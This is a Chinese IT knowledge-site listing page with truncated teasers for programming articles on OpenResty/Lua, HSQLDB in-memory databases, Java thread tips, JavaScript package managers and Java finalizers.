首先我们选择使用OpenResty，其是由Nginx核心加很多第三方模块组成，其最大的亮点是默认集成了Lua开发环境，使得Nginx可以作为一个Web Server使用。借助于Nginx的事件驱动模型和非阻塞IO，可以实现高性能的Web应用程序。而且OpenResty提供了大量组件如Mysql、Redis、Memcached等等，使在Nginx上开发Web应用更方便更简单。目前在京东如实时价格、秒
                                
                                
HSQLDB In-Process方式访问内存数据库
                                    liyonghui160com

                                    
  
  
HSQLDB一大特色就是能够在内存中建立数据库，当然它也能将这些内存数据库保存到文件中以便实现真正的持久化。 
  
先睹为快！ 
  
下面是一个In-Process方式访问内存数据库的代码示例： 
  
  
下面代码需要引入hsqldb.jar包 （hsqldb-2.2.8） 
  
import java.s
                                
                                
Java线程的5个使用技巧
                                    pda158
java数据结构
                                    
Java线程有哪些不太为人所知的技巧与用法？   　　萝卜白菜各有所爱。像我就喜欢Java。学无止境，这也是我喜欢它的一个原因。日常 
工作中你所用到的工具，通常都有些你从来没有了解过的东西，比方说某个方法或者是一些有趣的用法。比如说线程。没错，就是线程。或者确切说是Thread这个类。当我们在构建高可扩展性系统的时候，通常会面临各种各样的并发编程的问题，不过我们现在所要讲的可能会略有不同。   
                                
                                
开发资源大整合：编程语言篇——JavaScript（1）
                                    shoothao
JavaScript
                                    
概述：本系列的资源整合来自于github中各个领域的大牛，来收藏你感兴趣的东西吧。           
  程序包管理器  
  管理javascript库并提供对这些库的快速使用与打包的服务。 
 
  Bower - 用于web的程序包管理。 
  component - 用于客户端的程序包管理，构建更好的web应用程序。 
  spm - 全新的静态的文件包管
                                
                                
避免使用终结函数
                                    vahoa.ma
javajvmC++
                                    
终结函数（finalizer）通常是不可预测的，常常也是很危险的，一般情况下不是必要的。使用终结函数会导致不稳定的行为、更差的性能，以及带来移植性问题。不要把终结函数当做C++中的析构函数（destructors）的对应物。 
  
    我自己总结了一下这一条的综合性结论是这样的： 
1）在涉及使用资源，使用完毕后要释放资源的情形下，首先要用一个显示的方
                                
                
            
        
    

    

        

            按字母分类：
            ABCDEFGHIJKLMNOPQRSTUVWXYZ其他
        
    

    

        

            首页 -
            关于我们 -
            站内搜索 -
            Sitemap -
            侵权投诉
        
        
版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.